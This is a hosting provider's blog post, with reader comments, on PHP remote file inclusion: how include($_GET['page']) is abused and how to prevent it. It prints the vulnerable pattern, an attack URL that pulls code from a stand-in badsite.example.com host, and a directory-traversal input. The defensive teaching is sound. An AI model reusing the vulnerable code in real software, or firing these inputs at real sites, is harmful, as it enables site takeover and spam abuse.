A PHP Include Exploit Explained

We are having a fairly consistent problem with spammers auto-exploiting a very common type of scripting vulnerability that appears on our members’ sites. Unlike most vulnerabilities that stem from a faulty version of some app a lot of people use, this one crops up primarily on sites containing PHP code that people write themselves.

Cleaning up the resulting messes is getting a little tedious and so, even though this is hardly a new exploit, I wanted to write a little bit about what the vulnerability is, how it works, how spammers exploit it, and how to keep your site safe.

Let’s start with the problem code. If you’ve written a PHP script on your site that contains code similar to the following, you’re probably vulnerable:

$page = $_GET['page'] . ".php";
include($page);

A lot of people seem to use code like this. If they call this script exploitme.php, then the URLs for this type of site wind up looking like this:

http://example.nfshost.com/exploitme.php?page=main
http://example.nfshost.com/exploitme.php?page=contact
http://example.nfshost.com/exploitme.php?page=faq

Then, they put the body of each page into main.php, contact.php, and faq.php. They put the stuff that’s the same on every page in exploitme.php and, presto, instant mini-CMS.

How does this get exploited?

When interacting with this script, the attacker has no need to limit themselves to the URLs the page author intended. What they use instead tends to look like this:

http://example.nfshost.com/exploitme.php?page=http://badsite.example.com/urhacked.txt%3F

Most people don’t know that include() will happily pull in the contents of that urhacked.txt file from some other site and execute it. The other site doesn’t even have to be running PHP; the exploit code could be on some other already-hacked site, or anywhere that the hacker can put a text file.

The “urhacked.txt” file actually contains whatever PHP commands the attacker wants to execute. Typically, this means sending out tons of spam, which comes from the vulnerable site. Spotting the huge email queue from a site that’s never sent email in its life is usually how we find out about it. But that’s not all they can do; this is an “arbitrary code” exploit. They can do whatever they want using the same privileges the exploited page has. Security researchers call exploits of this type the confused deputy problem.
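
To make that concrete, here is a deliberately harmless, purely hypothetical sketch of the kind of file an attacker might host. The filename and every line in it are made up for illustration; real payloads are nastier:

<?php
// Hypothetical urhacked.txt: it sits on the attacker's server as plain text,
// but once the vulnerable site include()s it, it runs as PHP with that
// site's privileges.
echo "Arbitrary code now running as " . get_current_user() . "\n";
// A real payload would do worse: loop over a list of addresses calling
// mail() to send spam, or read the site's own files looking for things
// like database passwords.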

What makes this particular vulnerability even worse is that it’s possible to detect and exploit automatically. Attackers are smart enough to query search engines for lists of pages with links embedded in the format shown above. All their attack script needs to do is identify the URL of your page and the name of the variable used to hold the target page.

This is a problem because a whole lot of people think “no one bad will ever find or bother trying to exploit my little site.” They don’t realize that it’s no bother; it’s done completely automatically. If you’ve got a vulnerability like this, getting exploited is not “if,” it’s “when.”

Also, the %3F at the end of the attacker’s “page” value decodes into a question mark. This is because the attacker assumes the site will add .php or something to the name they give it to get the filename to load. So the URL that the site winds up loading looks like this:

http://badsite.example.com/urhacked.txt?.php

Assuming that urhacked.txt is a static file, the ? and everything after it will be discarded and the malicious contents will be returned no matter what the site adds at the end.

How to prevent it?

Our default permissions and user/group setup prevent a lot of these from getting worse; by default the attacker cannot execute system commands, create, remove, or (worse) edit files. But the attackers can (and do) send spam. And they can read any files on your site that contain stuff like database passwords you’d probably rather they didn’t have.

Worse, sometimes people irritated with the complexities of getting permissions and ownership exactly right leave things wide open. When that mindset encounters this vulnerability, the resulting damage to the affected site is usually unrecoverable.

So, the first thing one tends to want to do upon finding out about this is to disable the ability of PHP’s include() function to load files from remote sites. You can do this by adding the following line to your site’s .htaccess file:

php_flag allow_url_include off
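
Depending on how your host runs PHP, php_flag lines in .htaccess may be ignored; if you’re able to supply your own php.ini instead, the equivalent setting there is:

allow_url_include = Off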

This is a good start, and definitely something to consider, but one of the authors of the Suhosin PHP security patch explained why that is inadequate some years ago.

The second thing that seems obvious is using file_exists() to make sure the file really exists before trying to load it. But file_exists() works on URLs too. D’oh!

There are two viable ways of eliminating this vulnerability.

The best approach, and the one we recommend, is not to create it in the first place. If you want five PHP pages to share a common header and footer (for example), then reverse the include(). In other words, the URL from the “main” example above:

http://example.nfshost.com/exploitme.php?page=main

changes to reference the main.php file directly:

http://example.nfshost.com/main.php

And then main.php looks like this:

<?php include(".../path/to/header.php"); ?>
The same main page content that was always there.
<?php include("…/path/to/footer.php"); ?>

This way, the exploitme.php script goes away (split into header and footer) and the site never has to trust the user about what belongs inside the very powerful include() statement. Adding a couple of lines (at most) of boilerplate code to each page of content is a small price to pay to eliminate an entire category of security problems.
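
If you haven’t built a site this way before, here’s a minimal sketch of what the two shared files might contain. The filenames and markup are only illustrative; any header and footer of your own will do:

<?php // header.php (illustrative): everything that comes before each page's content ?>
<html>
<head><title>My Site</title></head>
<body>

<?php // footer.php (illustrative): everything that comes after each page's content ?>
</body>
</html>

Each content page (main.php, contact.php, faq.php) then sandwiches its own markup between those two include() lines, and nothing the visitor sends ever gets near include().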

The second approach is to scrupulously validate the inputs before acting on them. Unfortunately, it’s very easy to get this wrong. So to help people get it right, we’re going to walk through the four necessary steps. (All four are essential; skip any one and the whole exercise becomes an elaborate waste of time.) They are:

  1. Examine and reject any input that isn’t entirely formed of “friendly” characters (e.g. letters and numbers).
  2. Put the “content” files (e.g. main.php, contact.php, faq.php) in a special subdirectory of your site’s “protected” directory.*
  3. Always refer to files handled in this way using absolute paths and/or system environment variables.
  4. Test the existence of the file before you include it.

Here’s a simple example:

$page = $_GET['page'];
if (!preg_match("/^[A-Za-z0-9_]+$/", $page))
    throw new BadPageException("Bad character(s)", $page);
$path = "{$_SERVER['NFSN_SITE_ROOT']}/protected/pages/{$page}.php";
if (!file_exists($path)) 
    throw new BadPageException("Page not found", $page);
include($path);

class BadPageException extends Exception {
    function __construct($err, $page) {
        $page = urlencode($page);
        if (strlen($page) > 128)
            $page = substr($page, 0, 128) . "…";
        parent::__construct("Error \"{$err}\" on \"{$page}\"");
    }
}

Line 1 retrieves the page name from the query string.
Lines 2-3 abort if it isn’t composed entirely of ASCII letters, numbers, and the underscore (_). (Step 1)
Line 4 correlates the page name with a specific filename in a special directory just for these types of pages (Step 2), using an absolute path based on site-independent environment variables (Step 3).
Lines 5-6 abort if the resulting filename doesn’t exist. (Step 4)
Line 7 includes the file.
Lines 9-16 are probably overkill for a “simple” example, but we wanted to show people how to do it right in the real world. When something goes wrong, these lines document the problem. The complexity here comes from “defanging” the requested page name before printing it in an error message. Usually you would want to configure your site to write such messages to its error log, so the defanging protects you from ten pages of gibberish, control codes that mess up your terminal when you read the log, and so on.
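
For completeness, here’s a sketch of one way the error handling could be wired together, reusing the BadPageException class from the example above. Logging via error_log() and answering with a 404 are reasonable defaults, not the only right choices:

try {
    // Same seven lines as the example above.
    $page = $_GET['page'];
    if (!preg_match("/^[A-Za-z0-9_]+$/", $page))
        throw new BadPageException("Bad character(s)", $page);
    $path = "{$_SERVER['NFSN_SITE_ROOT']}/protected/pages/{$page}.php";
    if (!file_exists($path))
        throw new BadPageException("Page not found", $page);
    include($path);
} catch (BadPageException $e) {
    // Record the defanged message where you can review it later.
    error_log($e->getMessage());
    // Tell the requester as little as possible.
    header("HTTP/1.0 404 Not Found");
    echo "Page not found.";
}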

So that’s it: one of the most common classes of exploit explored and examined, complete with working sample code. Please, please, if you code your own PHP, take a few minutes and check whether your site suffers from this problem. We waste hours every week cleaning up the messes it causes, and we’d much rather spend that time improving the service.

(Commented source available here.)

* For blog guests who may not be members of our service: On our service, each web site has a “public” directory and a “protected” directory. Files in “public” are directly accessible via the web, and files in “protected” are not. The contents of the “protected” directory are, however, accessible to scripts in the “public” directory. I.e., they can be accessed, but only indirectly by accessing the site’s public interface. This makes “protected” a good place to put data, include files, or other stuff that scripts need in order to run, but that you don’t want just anybody to download. The concept and terms are borrowed from object-oriented programming.

12 Comments


  1. Very interesting.

    By the way, you use ‘urhacked.txt’ in one place and ‘urexploited.txt’ to refer to the same file later.

    Thanks for pointing it out! I’ve corrected it. -jdw

    Comment by Tom Davies — November 5, 2009 #

  2. Wow I had no idea about that. But I’m having a bit of trouble understanding why step one, validating the inputs, isn’t enough. Could you explain why the site files should be in the protected directory?

    Files not meant to be accessed over the web go in the protected directory, so they can’t be accessed over the web. There are other ways to ensure that, like setting up directories and creating .htaccess files that deny all access, or checking in every script to see if it’s been called properly, but those are cumbersome and circuitous ways of accomplishing the same thing. -jdw

    Comment by Middlerun — November 5, 2009 #

  3. While your solution of not creating the problem in the first place is certainly the most effective, it’s not always practical – especially if you have a lot of pages to manage (if you have a major page layout change, for example, you have to change dozens of files with includes rather than the one index.php file).

    Handily, PHP includes the basename() and pathinfo() functions that all but eliminate this issue – not only for remote file inclusion attacks as demonstrated above, but also directory traversal attacks (i.e., vulnerable.php?page=../protected/hiddenFile.txt) and other similar exploits.

    You can then do something very simple like the following:

    
    <?php $template = isset($_GET['page']) ? basename($_GET['page']) : 'default';
    include "../protected/templates/$template.php"; // You should run file_exists() on this path, and 404 out if it returns false
    ?>

    It’s not the cleanest thing in the world (no SEO-friendly URLs, for example), but it’s relatively straightforward, safe, and foolproof.

    Comment by Eric Stern — November 5, 2009 #

  4. But why’s it such a problem if people can access your content files over the web? Aren’t we concerned here with stopping people from including scripts from external websites? Sorry if I’m being thick here, I just don’t see the connection between the two issues.

    The two issues (securing include() and properly locating secondary files) aren’t directly related, but we wanted to provide a “good role model” example of the right way to do it, and part of the right way to do it is to keep the secondary files out of the web-accessible tree. That’s just good site design and good security. -jdw

    Comment by Middlerun — November 5, 2009 #

  5. Eric,

    I disagree with the design of your “straightforward” example so fundamentally that I almost didn’t approve your comment; I feel it’s bad advice and would hate to see anybody say “well that example is shorter and he says it’s just as good, I will use that.”

    However, I did approve it so I could go over why I consider this line of thinking flawed, because I recognize that a lot of people do think that way. Maybe I can talk some of them out of it. 🙂

    First, to the extent your approach is “straightforward,” that’s because you omitted any form of error detection, validity checking, or problem reporting. All you’ve done is changed a call to preg_match() to basename() and deleted basically everything else. Properly implemented, your example would be exactly the same size and complexity as ours. Conversely, the example code can be equivalently oversimplified:

    $template = isset($_GET["page"]) ? preg_replace("/[^A-Za-z0-9_]/", "", $_GET["page"]) : "default";
    include "../protected/templates/$template.php"; // You should run file_exists() on this path, and 404 out if it returns false

    However, my position is that your example cannot be properly implemented because it discards vital information.

    basename() is designed to return the filename component of a partial or full pathname, not to validate user input (which is ultimately what a URL is). That you get a “safe” result is kind of a side effect of misusing this function. Stylistically, I have a problem with that, but that’s a matter of opinion and I respect that others may differ. In any case, you’re really just using basename() as a substitute for preg_replace() to save a few characters.

    But notice again that the example does not use preg_replace(), it uses preg_match(). That is because the goal of that step is not to fix the input, it is to validate it, so appropriate action (e.g. logging, alerting) can be taken if a problem is found.

    basename() and preg_replace() throw away that information; they don’t validate anything, they just silently pave over a lot of problems, both accidental and malicious. That basically helps people who attack your site hide their tracks. Which is bad. There are other problems too, like the way that approach creates an infinite number of “valid” alternate URLs that all produce the same content, but for me, voluntarily cooperating with attackers is the big one. You’re in a situation where you can look at the input and know positively that someone is screwing with you, why on earth would you say “I know they’re screwing with me, now how can I turn their malicious nonsense into a possibly valid input on their behalf?”

    My web sites are important to me. When people attack them, I don’t want to help, but I do want to know about it. The “blindly pave over problems” approach makes that impossible, and consequently it’s a style of programming I consider fundamentally problematic.

    -jdw

    Comment by jdw — November 6, 2009 #

  6. While I don’t do any custom PHP code on my websites, I really appreciate your blog posts like this one. They are always insightful, and it’s nice to know not only a bit of what you guys are seeing behind the scenes but also that there are actually people behind the scenes doing these types of things. I know the second point seems like it might be obvious, but it can be easier than you think to forget. I hope you post more blog entries in the future.

    Comment by Brad — November 7, 2009 #

  7. I usually have an array like this:

    
    <?php
    ## PUT YOUR SITE HEADER HERE
    
    	$pages = array(
    		'home' => 'home.php',
    		'about' => 'about.php',
    		'events' => array(
    			'announcements.php',
    			'calendar.php'
    		),
    		'removeCookies' => 'functionA'
    	);
    
    if(empty($_GET['page']))
    	$_GET['page'] = 'home';
    
    if(isset($pages[$_GET['page']])) {
    	$actions = $pages[$_GET['page']];
    	if(!is_array($actions))
    		$actions = array($actions);
    
    	foreach($actions as $action) {
    		if(is_callable($action))
    			call_user_func($action);
    		else
    			@include("{$_SERVER['NFSN_SITE_ROOT']}/protected/pages/{$action}.php");
    	}
    }else{
    	echo 'The command you requested is not allowed.';
    }
    
    ## PUT YOUR SITE FOOTER HERE
    ?>
    

    This allows you to keep an “instant mini-CMS” while circumventing the include exploit. Moreover, you are way more flexible: when you take a closer look at the $pages array you’ll see that $pages['events'] has two files associated with it and $pages['removeCookies'] refers to a function (which will be called if it exists).
    What I’m doing is following a strict whitelisting policy: the user only gets to do what has been whitelisted. This way you don’t have to worry about attackers breaking out of folders or injecting malicious scripts.

    I’m a big fan of the whitelist approach, and we almost mentioned it, but it does take extra effort on an ongoing basis since you have to touch that file every time you add a page. NearlyFreeSpeech uses a similar approach internally, and it’s well worth it, but the extra work still makes it a “no sale” for a lot of people. -jdw

    Comment by Paul Grill — November 8, 2009 #

  8. A couple comments about this:

    I always validate user input to include() [although I don’t have anything hosted on NFSN that needs that right now], but typically my validation consists of looking for slashes rather than your more proactive solution; since you can’t do malicious URL fetches without slashes, what benefit is there to rejecting anything with characters you might not want, at the risk of losing characters (underscores, dashes, Unicode) that you might need later?

    Also, if you’re just using a PHP script to put headers and footers onto otherwise static HTML, it might be more worthwhile to do the HTML generation statically, with (say) a Python script that takes in a folder of flat files and spits out static HTML files. (This is what I do.) Not only does it entirely remove the risk of making a code goof and ending up with an exploitable site, but it also saves a few cents by allowing you to deploy your site as static.

    The include($_GET["…"]) approach is based on mapping a portion of a URI to a portion of a filename, so you want to make sure you limit yourself to a subset of characters that work well in both places. Sure, if you want to allow other characters, go ahead. Underscore and dash probably won’t cause havoc. Unicode certainly might.

    Static generation is always a great approach, but the include($_GET["…"]) approach only has any appeal at all because it’s so easy. Static generation tends not to be, hence doesn’t appeal to the same crowd. -jdw

    Comment by dfl — November 8, 2009 #

  9. While the principle of validation over “fixing” is certainly the most security-rigorous solution, insisting on it ignores the previous acknowledgement that the exploit as a whole is something that small-site owners should be equally concerned about fixing. If being probed for the exploit is a web inevitability then you probably don’t want to bother with logs telling you that it’s happened. Early home desktop firewalls used to alert you every time someone on the internet probed you for an exploit you were protected against, but we quickly learned that most users have no use for this information.

    Reading this blog post has drawn my attention to one old site that “validates” using:
    if(file_exists('./include/' . $_GET['page'] . '.php'))
    Now it turns out that this is vulnerable to traversing to the parent directory and trying to execute index.php. But since that is harmless, unless there’s a counterexample that allows remote inclusion even when the include path starts with './', there’s not much incentive for me to fix it.

    Again, the purpose of our example is to be a good example of good security to people who may not have seen one before. If you look at it with the attitude of “security — why bother?” you probably won’t get much out of it. It only takes a couple of extra lines written one time to get it right.

    With respect to your example, the exploit comes not from remote code, but local uploads. Suppose you have a forum website that allows users to upload avatars. Someone uploads their PHP code as myavatar.gif and then calls your script with &page=../../forum/images/avatars/myavatar.gif and 10,000 people you’ve never heard of get phishing mails queued from your site.

    As far as incentive, you are absolutely right. The people who make this mistake aren’t the ones that suffer for it; we are. If “it’s the responsible thing to do” isn’t a good enough reason, I expect we will have to find a way to start charging for the hours we spend each week cleaning up the resulting messes. -jdw

    Comment by Will — November 10, 2009 #

  10. Jdw, thank you for posting this.

    I used to work in web hosting and it breaks my heart to see exploited code like this everywhere.

    It got to the point that our sysadmins modified the servers to include the url of the script that sent any mail message, making it easier to find and disable. Any mail sent from php included a header similar to:
    X-scripted-mail: web42.example.com/~nesman/htdocs/includes/forms.php

    I’ve seen so much of this that it makes me a very careful coder but I always worry that my best efforts won’t be enough. After all, the people that get exploited thought they had done enough as well.

    Comment by Don Delp — November 11, 2009 #

  11. I’ve been a full-time PHP programmer for the last 10 years or so. What it comes down to is that writing “infrastructure” is hard. There are lots of ways to screw it up and have Bad Things happen. Not to mention that solving the same problem over and over for every new project gets old quickly.

    This is one of the reasons I advocate using frameworks or CMSes for websites. Let an existing product do the heavy lifting so that you can concentrate on writing your business logic. There are literally dozens of free CMS packages out there, and no reason not to start using one right away. (my personal favorite is Drupal, YMMV)

    Comment by Douglas Muth — November 17, 2009 #

  12. There are at least two reasons in my mind *for some people* not to use an existing CMS. The first is that a lot of the existing ones are fairly monolithic and therefore on NFSN will take up more disk space and so forth, increasing costs. The second is that some of us write our own because that’s what we want to do – whether as a learning experience or just because we can.

    As demonstrated in this blog post, though, if any of us intend to roll our own we really need to pay attention to things like this!

    Comment by James — November 28, 2009 #

